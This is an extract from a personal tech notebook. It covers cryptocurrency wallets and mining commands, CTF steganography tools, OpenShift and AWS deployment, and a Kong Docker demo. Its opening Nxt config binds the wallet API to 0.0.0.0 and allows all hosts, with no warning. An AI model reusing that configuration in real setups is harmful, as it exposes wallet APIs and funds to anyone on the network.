nxt.allowedBotHosts=*;
nxt.apiServerHost=0.0.0.0
nxt.allowedUserHosts=*;
nxt.uiServerHost=0.0.0.0
# it will not be downloading the blockchain, which will be accessed using public nodes
nxt.isLightClient=true

$ ./run.sh

https://bitcoin.stackexchange.com/a/36825
https://nxtwiki.org/wiki/Nxt-default_properties_configuration_file
http://nxtwiki.org/wiki/FAQ#Is_there_a_light_wallet.2Fclient.3F

Blockchain explorer https://nxtportal.org/monitor/ https://mynxt.info/blockexplorer/

Node explorer https://peerexplorer.com/

Others http://nxtwiki.org/wiki/FAQ#What_is_the_size_of_the_Nxt_blockchain.3F https://www.nxter.org/new-to-nxt/ https://steemit.com/bitcoin-exchange/@arnoldwish/the-best-bitcoin-exchanges-of-2017-buy-bitcoin-with-paypal-credit-card-or-debit-card

12.1.11 Dogecoin http://dogecoin.com/

Install http://dogecoin.com/getting-started/#linux-desktop-os


Blockchain explorer https://dogechain.info/

Get Free Dogecoins http://indogewetrust.com/ http://www.dogefaucet.com/

12.1.12 Ripple XRP https://ripple.com/

Install https://rippex.net/carteira-ripple.php#/ https://buyingripple.com/#walletsetup

Blockchain explorer https://xrpcharts.ripple.com/#/graph https://ripple.com/build/ripple-info-tool/ https://bithomp.com/explorer/

12.1.13 Cloud Mining https://hashflare.io/#plans https://www.genesis-mining.com/pricing https://www.ccgmining.com/pricing-hash-rate-bch.php https://bitmann.org/hashflare-vs-genesis-mining/

12.2 Mining

12.2.1 Mining software https://en.bitcoin.it/wiki/Mining_software cgminer https://github.com/ckolivas/cgminer

$ sudo apt-get install cgminer
$ cgminer --userpass omidraha.worker1:anything --url stratum+tcp://jp.stratum.slushpool.com:3333

bfgminer
http://bfgminer.org/
https://linuxhint.com/bfgminer-ubuntu/
https://bitcointalk.org/?topic=877081

$ sudo apt-get install bfgminer
$ bfgminer -o stratum+tcp://jp.stratum.slushpool.com:3333 -u omidraha.worker1 -p anything

poclbm
https://github.com/m0mchil/poclbm

$ git clone https://github.com/m0mchil/poclbm
$ cd poclbm
$ poclbm.py omidraha.worker1:[email protected]:3333

MultiMiner https://github.com/nwoolls/MultiMiner https://github.com/nwoolls/MultiMiner/wiki/Installation

12.2.2 Pool

https://en.bitcoin.it/wiki/Comparison_of_mining_pools

slushpool
https://slushpool.com/help/get-started/getting_started
https://slushpool.com/help/get-started/advanced_mining
https://slushpool.com/help/get-started/mining_beginners

zcash
https://slushpool.com/help/get-started/getting_started_zcash
https://support.slushpool.com/section/29-zcash-mining-setup

flypool
https://flypool.org/

minergate
https://www.minergate.com/pool-stats/eth

antpool
https://www.antpool.com/

12.2.3 Hash Rate

Hash Rate Measured & its Unit

Hash rate denominations

1 kH/s is 1,000 (one thousand) hashes per second.
1 MH/s is 1,000,000 (one million) hashes per second.
1 GH/s is 1,000,000,000 (one billion) hashes per second.
1 TH/s is 1,000,000,000,000 (one trillion) hashes per second.
1 PH/s is 1,000,000,000,000,000 (one quadrillion) hashes per second.
1 EH/s is 1,000,000,000,000,000,000 (one quintillion) hashes per second.

Common Hash rate Conversions

1 MH/s = 1,000 kH/s
1 GH/s = 1,000 MH/s = 1,000,000 kH/s
1 TH/s = 1,000 GH/s = 1,000,000 MH/s = 1,000,000,000 kH/s
1 PH/s = 1,000 TH/s = 1,000,000 GH/s = 1,000,000,000 MH/s
1 EH/s = 1,000 PH/s = 1,000,000 TH/s = 1,000,000,000 GH/s

https://coinsutra.com/hash-rate-or-hash-power/
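For example, converting an illustrative 13.5 TH/s figure to smaller units with the factors above:

$ python -c "ths = 13.5; print(ths * 1e3, 'GH/s'); print(ths * 1e6, 'MH/s'); print(ths * 1e9, 'kH/s')"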

12.2.4 Best coin to mine https://whattomine.com/calculators https://www.bitdegree.org/tutorials/best-coin-to-mine/#Best_Coin_to_Mine_Some_Examples https://www.cointelligence.com/content/cryptocurrencies-can-still-mine-cpu-gpu-2018/ https://www.nicehash.com/

CHAPTER 13

CTF

Contents:

13.1 Tips

13.1.1 Tools

Steganography

audacity   # fast, cross-platform audio editor
outguess   # Universal Steganographic tool
steghide   # A steganography hiding tool
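Typical steghide usage looks like this (the file names and passphrase are placeholders):

# hide secret.txt inside cover.jpg, writing the result to stego.jpg
$ steghide embed -cf cover.jpg -ef secret.txt -sf stego.jpg -p 's3cret'
# extract the hidden file again
$ steghide extract -sf stego.jpg -p 's3cret'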


CHAPTER 14

Deploy

Contents:

14.1 Open shift

14.1.1 Installing the OpenShift Client Tools https://developers.openshift.com/en/getting-started-client-tools.html http://appsembler.com/blog/django-deployment-using-openshift/

$ sudo apt-get install ruby-full rubygems git-core

$ sudo gem install rhc

$ sudo rhc setup

OpenShift Client Tools (RHC) Setup Wizard

This wizard will help you upload your SSH keys, set your application namespace, and
check that other programs like Git are properly installed.

If you have your own OpenShift server, you can specify it now. Just hit enter to use
the server for OpenShift Online: openshift.redhat.com.
Enter the server hostname: |openshift.redhat.com|

You can add more servers later using 'rhc server'.

Login to openshift.redhat.com: or@*****.com
Password: *********************

OpenShift can create and store a token on disk which allows to you to access the
server without using your password. The key is stored in your home directory and
should be kept secret. You can delete the key at any time by running 'rhc logout'.
Generate a token now? (yes|no) yes
Generating an authorization token for this client ... lasts 30 days

Saving configuration to /home/or/.openshift/express.conf ... done

Checking for git ... found git version 2.1.1

Checking common problems .

An SSH connection could not be established to django-*****.rhcloud.com. Your SSH
configuration may not be correct, or the application may not be responding.
Authentication failed for user *****@django-*****.rhcloud.com (Net::SSH::AuthenticationFailed)

Checking for a domain ... or

Checking for applications ... found 1

django http://django-*****.rhcloud.com/

You are using 2 of 3 total
The following gear sizes are available to you: small

Your client tools are now configured.

or@debian:~$ ssh-add ~/.ssh/id_rsa
Identity added: /home/or/.ssh/id_rsa (/home/or/.ssh/id_rsa)
or@debian:~$ ssh *****@django-*****.rhcloud.com

*********************************************************************

You are accessing a service that is for use only by authorized users. If you do not have authorization, discontinue use at once. Any use of the services is subject to the applicable terms of the agreement which can be found at: https://www.openshift.com/legal

*********************************************************************

Welcome to OpenShift shell

This shell will assist you in managing OpenShift applications.

!!! IMPORTANT !!! IMPORTANT !!! IMPORTANT !!!
Shell access is quite powerful and it is possible for you to
accidentally damage your application. Proceed with care!
If worse comes to worst, destroy your application with
"rhc app delete" and recreate it.
!!! IMPORTANT !!! IMPORTANT !!! IMPORTANT !!!

Type "help" for more info.



[django-****.rhcloud.com ****]\> ls
app-deployments  app-root  gear-registry  git  haproxy  python
[django-****.rhcloud.com ****]\> exit
exit
Connection to django-****.rhcloud.com closed.
or@debian:~$

$ rhc deployment-list django

# Tail the logs of an application
$ rhc tail django

[openshift-server]\>ls -la app-root/data

[openshift-server]\>gear deploy

14.1.2 Django admin pass

[openshift-server]\> python app-root/repo/wsgi/my_prj/manage.py syncdb

[openshift-server]\> cp app-root/repo/wsgi/my_prj/sqlite3.db app-root/data

14.1.3 Openshift Environment Variables List https://developers.openshift.com/en/managing-environment-variables.html

14.1.4 Update rhc

$ gem update rhc httpclient

14.1.5 How to create and unset environment variables on the server ? https://help.openshift.com/hc/en-us/articles/202399310-How-to-create-and-use-environment-variables-on-the-server- https://blog.openshift.com/taking-advantage-of-environment-variables-in-openshift-php-apps/

$ rhc set-env My_VAR_1=my_val_1 My_VAR_2=my_val_2 -a app_name

$ rhc env set My_VAR_1=my_val_1 -a app_name

$ rhc env unset My_VAR_1 -a app_name

14.1.6 Restart the application


$ rhc app restart -a app_name

$ rhc app stop -a app_name $ rhc app start -a app_name

14.1.7 Using redmine on openshift https://www.openshift.com/quickstarts/redmine-24 https://github.com/openshift/openshift-redmine-quickstart https://forums.openshift.com/how-to-install-redmine-plugins-on-openshift

14.1.8 Payment https://help.openshift.com/hc/en-us/articles/202525320-What-are-the-payment-methods-for-OpenShift-Online- https://www.openshift.com/products/pricing http://www.tehranpayment.com/%d8%aa%d9%85%d8%a7%d8%b3-%d8%a8%d8%a7-%d9%85%d8%a7

14.1.9 To see where an existing application is being hosting https://developers.openshift.com/en/overview-platform-features.html#scaling

$ rhc app show --gears -a django

ID  State    Cartridges                Size   Region         Zone            SSH URL
--  -------  ------------------------  -----  -------------  --------------  -------------
*   started  python-2.7 haproxy-1.4    small  aws-us-east-1  aws-us-east-1e  *.rhcloud.com
*   started  postgresql-9.2            small  aws-us-east-1  aws-us-east-1e  *.rhcloud.com

14.2 Amazon https://github.com/boto/boto https://github.com/bitly/asyncdynamo https://pypi.python.org/pypi/dynamodb-mapper/1.1.0 https://pypi.python.org/pypi/ddbmock http://boto.readthedocs.org/en/latest/dynamodb2_tut.html Amazon upload http://stackoverflow.com/questions/670442/asynchronous-file-upload-to-amazon-s3-with-django https://github.com/jezdez/django-queued-storage https://github.com/sbc/django-uploadify-s3 https://github.com/burgalon/plupload-s3mixin http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingHTTPPOST.html https://aws.amazon.com/items/1434?externalID=1434

58 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html Django S3 https://github.com/etianen/django-s3-storage https://django-storages.readthedocs.org/en/latest/index.html Time Limited Signed UR http://www.bucketexplorer.com/documentation/amazon-s3–how-to-generate-url-for-amazon-s3-files.html http://stackoverflow.com/questions/17831535/how-to-generate-file-link-without-expiry AWS SDK for Python (Boto) http://aws.amazon.com/sdk-for-python/ http://boto.readthedocs.org/en/latest/index.html http://aws.amazon.com/python/ http://stackoverflow.com/questions/4993439/how-can-i-access-s3-files-in-python-using-urls http://sendapatch.se/projects/simples3/ http://stackoverflow.com/questions/11026719/is-there-a-way-to-serve-s3-files-directly-to-the-user-with-a-url-that-cant-be-s sign URLs with an IP CloudFront http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/GettingStarted.html http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/PrivateContent.html http://improve.dk/how-to-set-up-and-serve-private-content-using-s3/ session based authorization http://stackoverflow.com/questions/12279056/rails-allow-download-of-files-stored-on-s3-without-showing-the-actual-s3-url-to download private file https://medium.com/@hiromitz/generate-expiring-amazon-s3-link-with-custom-file-name-c277975c3b8d https://gist.github.com/hiromitz/9321852 https://pypi.python.org/pypi/Ax_Handoff/1.1.3 https://pypi.python.org/pypi/s3url/0.1.6 Boto http://boto.readthedocs.org/en/latest/index.html http://aws.amazon.com/developers/getting-started/python/ http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/private-content-signed-urls-overview.html http://www.networkautomation.com/automate/urc/resources/livedocs/am/10/Technical_Reference/Actions___Activities/Amazon_S3/S3_- _Get_Predesigned_URL.htm Amazon EC2 Amazon Elastic Compute Cloud (Amazon EC2) is a web service that provides resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers. Amazon EBS


Amazon Elastic Block Store (Amazon EBS) provides persistent block level storage volumes for use with Amazon EC2 instances in the AWS Cloud. Each Amazon EBS is automatically replicated within its Availability Zone to protect you from component failure, offering high availability and durability. Amazon EBS volumes offer the consistent and low-latency performance needed to run your workloads. With Amazon EBS, you can scale your usage up or down within minutes – all while paying a low price for only what you provision. ### http://alestic.com/2012/01/ec2-ebs-boot-recommended http://tiger-fish.com/blog/how-boot-amazon-ec2-instance-ebs-volume http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ ### http://stackoverflow.com/questions/10390244/how-to-set-up-a-django-project-with-django-storages-and-amazon-s3-but-with-diff https://github.com/mstarinteractive/django-s3storage https://github.com/mstarinteractive/django-s3storage/blob/master/example_settings.py http://tartarus.org/james/diary/2013/07/18/fun-with-django-storage-backends http://djangotricks.blogspot.de/2013/12/how-to-store-your-media-files-in-amazon.html https://github.com/pcraciunoiu/django-s3sync How to serve your media files via Amazon’s Simple Storage Service http://stackoverflow.com/questions/11403063/setting-media-url-for-django-heroku-app-amazon-s3 https://github.com/django-compressor/django-compressor http://stackoverflow.com/questions/11403063/setting-media-url-for-django-heroku-app-amazon-s3 http://stackoverflow.com/questions/10390244/how-to-set-up-a-django-project-with-django-storages-and-amazon-s3-but-with-diff http://www.caktusgroup.com/blog/2014/11/10/Using-Amazon-S3-to-store-your-Django-sites-static-and-media-files/ http://martinbrochhaus.com/s3.html http://stackoverflow.com/questions/9464038/redis-celery-configuration-over-amazon-ec2 http://stackoverflow.com/questions/14283021/how-to-use-django-celery-rq-worker-to-execute-a-video-filetype-conversion-ffm http://django-storages.readthedocs.org/en/latest/ https://docs.djangoproject.com/en/1.7/howto/static-files/deployment/#staticfiles-from-cdn ### http://www.caktusgroup.com/blog/2014/11/10/Using-Amazon-S3-to-store-your-Django-sites-static-and-media-files/ ### ### http://docs.aws.amazon.com/general/latest/gr/signing_aws_api_requests.html http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html http://docs.aws.amazon.com/STS/latest/APIReference/Welcome.html ### ### http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingHTTPPOST.html

60 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://aws.amazon.com/items/1434?externalID=1434 ### ### AWS RDS Postgres DB instance http://aws.amazon.com/rds/postgresql/ http://aws.amazon.com/about-aws/whats-new/2013/12/11/aws-elastic-beanstalk-adds-background-task-handling-and-rds-postgresql-support/ http://stackoverflow.com/questions/26043706/how-to-use-boto-to-launch-an-elastic-beanstalk-with-an-rds-resource http://stackoverflow.com/questions/25946723/aws-cli-create-rds-with-elasticbeanstalk-create-environment/ 25963800#25963800 http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_flask.html http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python.rds.html http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_PostgreSQL.html http://stackoverflow.com/questions/13424267/setting-up-django-and-postgresql-on-two-different-ec2-instances http://stackoverflow.com/questions/12850550/postgresql-for-django-on-elastic-beanstalk http://instagram-engineering.tumblr.com/post/13649370142/what-powers-instagram-hundreds-of-instances http://www.holovaty.com/writing/aws-notes/ http://stackoverflow.com/questions/22599367/deploy-django-using--to-aws-ec2-and-rds http://stackoverflow.com/questions/20914706/aws-elastic-beanstalk-hosting-postresql-on-deployed-ec2-server-with-django http://www.quora.com/If-I-have-an-AWS-RDS-Postgres-DB-instance-do-I-also-need-to-install-Postgres-in-the-EC2-instance-that-has-my-Django-application-in-it http://stackoverflow.com/questions/25740502/aws-can-a-beanstalk-instance-be-deployed-with-a-postgres-rds http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.RDS.html ### https://github.com/tornadoweb/tornado/wiki/Links http://stackoverflow.com/questions/11638135/amazon-aws-python-webframework-dynamodb ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.loggingS3.title.html ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/command-options.html#command-options-python http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_custom_container.html ### http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.platforms.html http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.concepts.architecture.html ### http://docs.aws.amazon.com/general/latest/gr/rande.html?r=1166 ### http://docs.aws.amazon.com/IAM/latest/ UserGuide/Using_SettingUpUser.html http://docs.aws.amazon.com/general/latest/gr/getting-aws-sec-creds.html http://docs.aws.amazon.com/IAM/latest/UserGuide/IAMBestPractices.html ### http://aws.amazon.com/code/6752709412171743 ### Deploying a Django app on Amazon EC2 instance http://agiliq.com/blog/2014/08/deploying-a-django-app-on-amazon-ec2-instance/

14.2. Amazon 61 Omid Raha MyStack Documentation, Release 0.1 http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_django.html https://ashokfernandez.wordpress.com/2014/03/11/deploying-a-django-app-to-amazon-aws-with-nginx-gunicorn-git/ https://github.com/ashokfernandez/Django-Fabric-AWS—amazon_app http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_flask.html ### Amazon ECS http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html Identity and Access Management https://console.aws.amazon.com/iam/home#home Before the Amazon ECS agent can register container instance into a cluster, the agent must know which account credentials to use. You can create an IAM role that allows the agent to know which account it should register the container instance with. When you launch an instance with the Amazon ECS-optimized AMI provided by Amazon using this role, the agent automatically registers the container instance into your default cluster. The Amazon ECS container agent also makes calls to the Amazon EC2 and Elastic Load Balancing on your behalf, so container instances can be registered and deregistered with load balancers. Before you can attach a load balancer to an Amazon ECS service, you must create an IAM role for your services to use before you start them. This requirement applies to any Amazon ECS service that you plan to use with a load balancer. http://docs.aws.amazon.com/AmazonECS/latest/developerguide/instance_IAM_role.html https://console.aws.amazon.com/iam/home#roles Amazon EC2 Role for EC2 Container Service Role to allow EC2 instances in an Amazon ECS cluster to access Amazon ECS. https://console.aws.amazon.com/ec2/ http://www.prokerala.com/travel/distance/from-california/to-vancouver-usa/ Distance To Vancouver From Oregon is: 1692 miles / 2723.01 km / 1470.31 nautical miles Distance To Virginia From Vancouver is: 1725 miles / 2776.12 km / 1498.98 nautical miles Distance To Vancouver From California is: 2403 miles / 3867.25 km / 2088.15 nautical miles http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html#create-an-iam-user http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_GetStarted.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/get-set-up-for-amazon-ecs.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_GetStarted.html https://us-west-2.console.aws.amazon.com/ecs/home?region=us-west-2#/firstRun # Virginia https://console.aws.amazon.com/ecs/home?region=us-east-1#/firstRun https://aws.amazon.com/ecr/getting-started/ ECR http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_GetStarted.html https://console.aws.amazon.com/ecs/home?region=us-east-1#/repositories http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-set-up.html#cli-signup

62 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1 https://console.aws.amazon.com/ecs/home?region=us-east-1#/repositories/create aws configure aws ecr get-login –region us-east-1 http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-pull-ecr-image.html https://docs.docker.com/mac/ step_six/ https://docs.docker.com/engine/reference/commandline/tag/ http://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_AWSCLI.html http://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html https://aws.amazon.com/blogs/aws/ec2-container-registry-now-generally-available/ Effective today, Amazon ECR is available in US East (Northern Virginia) with more regions on the way soon! Your Amazon ECS tasks run on container instances (Amazon EC2 instances that are running the ECS container agent). http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_defintions.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-load-balancing.html A service lets you specify how many copies of your task definition to run. You could also use Elastic Load Balancing to distribute incoming traffic to your tasks. Amazon ECS keeps that number of tasks running and coordinates task with the load balancer. http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html http://docs. aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_docker_ecs.html http://docs.aws.amazon.com/ elasticbeanstalk/latest/dg/create_deploy_docker.html https://aws.amazon.com/about-aws/whats-new/2015/03/ aws-elastic-beanstalk-supports-multi-container-docker-environments/ http://cloudacademy.com/blog/amazon-ec2-container-service-docker-aws/ Task definitions specify the container information for your application, such as how many containers are part of your task, what resources they will use, how they are linked together, and which host ports they will use http://docs.aws.amazon.com/AmazonECS/latest/developerguide/cmd-ecs-cli-compose.html https://aws.amazon.com/about-aws/whats-new/2015/10/introducing-the-amazon-ec2-container-service-cli-with-support-for-docker-compose/ http://docs.aws.amazon.com/AmazonECS/latest/developerguide/cmd-ecs-cli-compose-service.html After you create a cluster, you can launch container instances, and then run tasks http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI.html http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-quick-configuration http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI_tutorial.html http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definition_parameters.html https://aws.amazon.com/blogs/aws/ec2-container-service-ecs-update-access-private-docker-repos-mount-volumes-in-containers/ http://docs.aws.amazon.com/AmazonECS/latest/developerguide/using_data_volumes.html http://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSGettingStartedGuide/AWSCredentials.html

14.2.1 RDS http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.html http://aws.amazon.com/rds/details/multi-az/


If a storage volume on your primary fails in a Multi-AZ deployment, Amazon RDS automatically initiates a failover to the up-to-date standby. Compare this to a Single-AZ deployment: in case of a Single-AZ database failure, a user-initiated point-in-time restore operation will be required. This operation can take several hours to complete, and any data updates that occurred after the latest restorable time (typically within the last five minutes) will not be available.
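As a quick sketch (the identifiers and values below are hypothetical, not from these notes), a Multi-AZ instance can be requested at creation time with the AWS CLI's --multi-az flag:

$ aws rds create-db-instance \
    --db-instance-identifier demo-db \
    --db-instance-class db.t2.micro \
    --engine postgres \
    --allocated-storage 20 \
    --master-username demo_admin \
    --master-user-password '<choose-a-password>' \
    --multi-az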

14.2.2 EC2 Container Service

$ sudo apt-cache search awscli
awscli - Universal Command Line Environment for AWS

$ sudo apt-get install awscli

$ aws --version
aws-cli/1.10.1 Python/3.5.1+ Linux/4.4.0-1-amd64 botocore/1.3.23

$ aws configure
AWS Access Key ID []: ****************
AWS Secret Access Key []: ****************
Default region name [oregon]: us-west-2
Default output format [json]:

$ aws iam list-users

$ aws ecs create-cluster help
$ aws ecs list-container-instances help

$ aws ecs create-cluster --cluster-name demo-01
{
    "cluster": {
        "pendingTasksCount": 0,
        "runningTasksCount": 0,
        "clusterName": "demo-01",
        "status": "ACTIVE",
        "clusterArn": "arn:aws:ecs:us-west-2:642913345125:cluster/demo-01",
        "activeServicesCount": 0,
        "registeredContainerInstancesCount": 0
    }
}

$ aws ecs list-container-instances --cluster demo-01

Within ECS, you create task definitions, which are very similar to a docker-compose.yml file. A task definition is a collection of container definitions, each of which has a name, the Docker image to run, and options to override the image's entrypoint and command. The container definition is also where you define environment variables, port mappings, volumes to mount, memory and CPU allocation, and whether or not the specific container should be considered essential, which is how ECS knows whether the task is healthy or needs to be restarted. You can set up multiple container definitions within the task definition for multi-container applications.

ECS knows how to pull from the official Docker Hub by default and can be configured to pull from private registries as well. Private registries, however, require additional configuration for the Docker client installed on the EC2 host instances.

Once you have a task definition, you can create a service from it. A service allows you to define the number of tasks you want running and associate them with an Elastic Load Balancer (ELB). When a task maps to particular ports, like 443, only one task instance can be running per EC2 instance in the ECS cluster. Therefore, you cannot run more tasks than you have EC2 instances. In fact, you'll want to make sure you run at least one less task than the number of EC2 instances in order to take advantage of blue-green deployments. Task definitions are versioned, and services are configured to use a specific version of a task definition.
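A minimal, hypothetical task definition sketch (names and values are illustrative) showing the container definition fields mentioned above; it could be registered with aws ecs register-task-definition --cli-input-json file://web-task.json:

{
  "family": "web-demo",
  "containerDefinitions": [
    {
      "name": "web",
      "image": "nginx:latest",
      "cpu": 128,
      "memory": 256,
      "essential": true,
      "portMappings": [
        { "containerPort": 80, "hostPort": 80 }
      ],
      "environment": [
        { "name": "APP_ENV", "value": "production" }
      ]
    }
  ]
}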


https://blog.codeship.com/easy-blue-green-deployments-on-amazon-ec2-container-service/#comments

14.3 Configuration management

Configuration management (CM) is a systems engineering process for establishing and maintaining consistency of a product’s performance, functional and physical attributes with its requirements, design and operational information throughout its life.

14.3.1 Operating System configuration management

Configuration management can be used to maintain OS configuration files. Example systems include Quattor, CFEngine, Bcfg2, Puppet, Ansible, Vagrant and Chef. https://en.wikipedia.org/wiki/Configuration_management https://blog.serverdensity.com/what-ive-learnt-from-using-ansible-exclusively-for-2-years/ http://thenewstack.io/are-docker-users-migrating-to-ansible-and-away-from-puppet-and-chef/ http://chadfowler.com/blog/2013/06/23/immutable-deployments/ http://theagileadmin.com/what-is-devops/

14.4 Tips

14.4.1 PaaS (platform as a service) https://openshift.redhat.com/ https://www.dotcloud.com/pricing.html https://www.heroku.com/ http://www.paasify.it/compare/heroku-vs-openshift%20online http://www.slideshare.net/Pivotal/paa-s-comparison2014v08

14.4.2 VPS Provider

https://www.digitalocean.com/pricing/
https://www.vultr.com/pricing/
https://www.dreamhost.com/cloud/storage/
http://www.rackspace.com/cloud/servers
http://www.cloudvps.com/virtual-private-server/prices
https://www.transip.eu/vps/
https://www.transip.eu/demo-account/?landing=/cp/vps/
https://www.transip.eu/cp/vps/#vps-informatie
https://www.transip.eu/question/350-utilize-disk-space-for-bladevps/


14.4.3 Digital Ocean http://www.scriptrock.com/articles/digitalocean-vs-aws

More storage options?

https://www.digitalocean.com/community/questions/can-i-increase-storage
https://www.digitalocean.com/community/questions/more-storage-option
http://digitalocean.uservoice.com/forums/136585-digital-ocean/suggestions/3127077-extra-diskspace-
http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/6662293-s3-object-storage-alternative
https://www.digitalocean.com/community/questions/getting-more-space-on-droplet
https://raymii.org/s/articles/Digital_Ocean_Sucks._Use_Digital_Ocean.html
http://venturebeat.com/2013/12/30/iaas-provider-digitalocean-finds-itself-back-in-security-trouble/
https://news.ycombinator.com/item?id=6764102

mysqldump --skip-extended-insert --all-databases --single-transaction --master-data=2 --flush-logs | gzip -9 --rsyncable > backup.sql.gz
sudo -u postgres pg_dumpall | gzip -9 --rsyncable > backup.sql.gz

Using https://firefli.de/tutorials/s3fs-and-dreamobjects.html http://www.maketecheasier.com/mount-amazon-s3-in-ubuntu/

Security issues https://github.com/fog/fog/issues/2525 http://seclists.org/fulldisclosure/2013/Aug/53

Others http://rdiff-backup.nongnu.org/ http://www.rsync.net/products/pricing.html https://github.com/vgough/encfs https://github.com/s3fs-fuse/s3fs-fuse

14.4.4 Amazon http://aws.amazon.com http://aws.amazon.com/iam/ http://aws.amazon.com/s3/ http://aws.amazon.com/ec2/

http://aws.amazon.com/ec2/pricing/
http://aws.amazon.com/free/
http://aws.amazon.com/ec2/instance-types/
http://aws.amazon.com/elasticbeanstalk/
http://aws.amazon.com/elasticbeanstalk/pricing/

EC2 is IaaS.

Deploy django on amazon http://www.nickpolet.com/blog/deploying-django-on-aws/1/ http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/create_deploy_Python_django.html http://agiliq.com/blog/2014/08/deploying-a-django-app-on-amazon-ec2-instance/ http://agiliq.com/blog/2009/03/django-with-mysql-and-apache-on-ec2/ http://thomas.broxrost.com/2008/08/21/persistent-django-on-amazon-ec2-and-ebs-the-easy-way/ http://pragmaticstartup.wordpress.com/2011/04/02/non-techie-guide-to-setting-up-django-apache-mysql-on-amazon-ec2/ http://www.philroche.net/archives/simple-django-install-on-amazon-ec2/ http://www.mlsite.net/blog/?p=43 http://michal.karzynski.pl/blog/2013/06/09/django-nginx-gunicorn-virtualenv-supervisor/

14.4.5 Blue Green Deployment http://martinfowler.com/bliki/BlueGreenDeployment.html

14.4.6 Continuous Delivery http://martinfowler.com/books/continuousDelivery.html

14.4.7 Continuous Integration http://martinfowler.com/articles/continuousIntegration.html

14.4.8 Feature toggle http://code.flickr.net/2009/12/02/flipping-out/ https://en.wikipedia.org/wiki/Feature_toggle

14.4.9 Log collection service http://logstash.net/ https://papertrailapp.com/


14.4.10 How to configure Google Client Id and Google Client Secret? https://console.developers.google.com/project http://storeprestamodules.com/blog/how-to-configure-google-client-id-and-google-client-secret/

14.4.11 Kong with docker

docker run --rm --name kong-database \
    -p 5432:5432 \
    -e "POSTGRES_USER=kong" \
    -e "POSTGRES_DB=kong" \
    postgres:9.4

docker run --rm --name kong \
    --link kong-database:kong-database \
    -e "DATABASE=postgres" \
    -p 8000:8000 \
    -p 8443:8443 \
    -p 8001:8001 \
    -p 7946:7946 \
    -p 7946:7946/udp \
    --security-opt seccomp:unconfined \
    mashape/kong

curl -i -X GET \
    --url http://localhost:8000/ \
    --header 'Host: mockbin.com'

curl -i -X POST \
    --url http://localhost:8001/apis/ \
    --data 'name=mockbin' \
    --data 'upstream_url=http://mockbin.com/' \
    --data 'request_host=mockbin.com'

curl -i -X POST \
    --url http://localhost:8001/apis/mockbin/plugins/ \
    --data 'name=key-auth'

curl -i -X POST \
    --url http://localhost:8001/consumers/ \
    --data "username=Jason"

curl -i -X POST \
    --url http://localhost:8001/consumers/Jason/key-auth/ \
    --data 'key=ENTER_KEY_HERE'

curl -i -X GET \
    --url http://localhost:8000 \
    --header "Host: mockbin.com" \
    --header "apikey: ENTER_KEY_HERE"

https://github.com/Mashape/kong/


14.4.12 Combine and minimize JavaScript, CSS and Images files https://github.com/mrclay/minify https://github.com/yui/yuicompressor https://github.com/django-compressor/django-compressor https://github.com/jazzband/django-pipeline https://samaxes.com/2009/05/combine-and-minimize-javascript-and--files-for-faster-loading/ https://robertnyman.com/2010/01/19/tools-for-concatenating-and-minifying-css-and--files-in-different-development-environments/ https://robertnyman.com/2010/01/15/how-to-reduce-the-number-of-http-requests/ http://www.revsys.com/12days/front-end-performance/ https://developers.google.com/speed/pagespeed/insights/?url=google.com https://developers.google.com/speed/docs/insights/rules#speed-rules

14.5 Vagrant

